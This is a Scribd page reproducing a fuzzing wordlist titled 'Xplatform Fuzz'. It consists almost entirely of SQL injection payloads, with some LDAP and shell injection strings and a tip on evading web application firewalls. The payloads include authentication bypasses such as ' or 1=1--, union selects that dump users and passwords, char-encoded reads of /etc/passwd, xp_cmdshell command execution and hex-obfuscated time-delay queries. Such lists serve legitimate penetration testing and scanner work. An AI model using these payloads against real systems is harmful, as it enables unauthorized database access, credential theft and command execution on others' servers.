0% found this document useful (0 votes)
3 views4 pages

Xplatform Fuzz

The document contains a comprehensive list of SQL injection techniques and payloads that can be used to bypass web application firewalls (WAF) and exploit vulnerabilities in SQL databases. It includes various forms of SQL commands, logical operators, and encoding methods to manipulate database queries. The content serves as a reference for security testing and understanding potential attack vectors in web applications.

Uploaded by

cnmsbguge2021
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
3 views4 pages

Xplatform Fuzz

The document contains a comprehensive list of SQL injection techniques and payloads that can be used to bypass web application firewalls (WAF) and exploit vulnerabilities in SQL databases. It includes various forms of SQL commands, logical operators, and encoding methods to manipulate database queries. The content serves as a reference for security testing and understanding potential attack vectors in web applications.

Uploaded by

cnmsbguge2021
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

# to attempt with ids/waf evasion try like

# /index.aspx?page=select 1&page=2,3 from table where id=1


<>"'%;)(&+
|
!
?
/
//
//*
'
' --
(
)
*|
*/*
&
0
031003000270000
0 or 1=1
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
1 or 1=1
1;SELECT%20*
1 waitfor delay '0:0:10'--
'%20or%20''='
'%20or%201=1
')%20or%20('x'='x
'%20or%20'x'='x
%20or%20x=x
%20'sleep%2050'
%20$(sleep%2050)
%21
23 OR 1=1
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
||6
'||'6
(||6)
%7C
a'
admin' or '
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
' and 1 in (select var from temp)--
anything' OR 'x'='x
"a"" or 1=1--"
a' or 1=1--
"a"" or 3=3--"
a' or 3=3--
a' or 'a' = 'a
&apos;%20OR
as
asc
a' waitfor delay '0:0:10'--
'; begin declare @var varchar(8000) set @var=':' select
@var=@var+'+login+'/'+password+' ' from users where login >
bfilename
char%4039%41%2b%40SELECT
declare @q nvarchar (200)
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003
000270000 exec(@q)
declare @q nvarchar (4000) select @q =
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @s varchar(22) select @s =
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
delete
desc
distinct
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
exec(@s)
'; exec ('sel' + 'ect us' + 'er')
exec sp
'; execute immediate 'sel' || 'ect us' || 'er'
exec xp
'; exec xp_regread
' group by userid having 1=1--
handler
having
' having 1=1--
hi or 1=1 --"
hi' or 1=1 --
"hi"") or (""a""=""a"
hi or a=a
hi' or 'a'='a
hi') or ('a'='a
'hi' or 'x'='x';
insert
like
limit
*(|(mail=*))
*(|(objectclass=*))
or
' or ''='
or 0=0 #"
' or 0=0 --
' or 0=0 #
" or 0=0 --
or 0=0 --
or 0=0 #
' or 1 --'
' or 1/*
; or '1'='1'
' or '1'='1
' or '1'='1'--
' or 1=1
' or 1=1 /*
' or 1=1--
' or 1=1--
'/**/or/**/1/**/=/**/1
‘ or 1=1 --
" or 1=1--
or 1=1
or 1=1--
or 1=1 or ""=
' or 1=1 or ''='
' or 1 in (select @@version)--
or%201=1
or%201=1 --
' or 2 > 1
' or 2 between 1 and 3
' or 3=3
‘ or 3=3 --
' or '7659'='7659
or a=a
or a = a
' or 'a'='a
' or a=a--
') or ('a'='a
" or "a"="a
) or (a=a
order by
' or (EXISTS)
or isNULL(1/0) /*
" or isNULL(1/0) /*
' or 'something' like 'some%'
' or 'something' = 'some'+'thing'
' or 'text' = n'text'
' or 'text' > 't'
' or uid like '%
' or uname like '%
' or 'unusual' = 'unusual'
' or userid like '%
' or user like '%
' or username like '%
' or username like char(37);
' or 'whatever' in ('whatever')
' -- &password=
password:*/=1--
PRINT
PRINT @@variable
procedure
replace
select
' select * from information_schema.tables--
' select name from syscolumns where id = (select id from sysobjects where name =
tablename')--
' (select top 1
--sp_password
'sqlattempt1
(sqlattempt2)
'sqlvuln
'+sqlvuln
(sqlvuln)
sqlvuln;
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
' UNION ALL SELECT
' union all select @@version--
' union select
uni/**/on sel/**/ect
' UNION SELECT
' union select 1,load_file('/etc/passwd'),1,1,1;
) union select * from information_schema.tables;
' union select * from users where login = char(114,111,111,116);
update
'||UTL_HTTP.REQUEST
,@variable
@variable
@var select @var as var into temp end --
\x27UNION SELECT
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' or 1=1 or 'x'='y
x' OR full_name LIKE '%Bob%
ý or 1=1 --

You might also like